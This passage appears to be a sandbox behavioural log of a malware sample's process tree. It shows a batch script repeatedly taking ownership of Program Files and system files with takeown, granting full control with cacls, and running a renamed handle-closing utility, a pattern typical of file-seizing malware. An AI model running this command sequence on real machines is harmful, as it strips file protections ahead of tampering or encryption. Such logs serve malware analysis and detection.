- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:2144
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:1224
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:3304
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:3240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "background.png" -nobanner
      4⤵
      PID:544
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""
  2⤵
  PID:3316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:3360
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""
  2⤵
  PID:2508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""
  2⤵
  PID:3356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"
    3⤵
    PID:3504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:3500
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1664
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:3544
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  PID:1196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    PID:3584
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      PID:2152
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1760
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2292
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2980
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1580
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2796
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:1216
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:3612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:3712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:3788
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:1828
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:2476
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:2336
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:2468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:3128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:3132
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:3224
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:2100
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:4000
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:4008
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:2704
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:2604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:3188
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1224
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:3300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2912
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
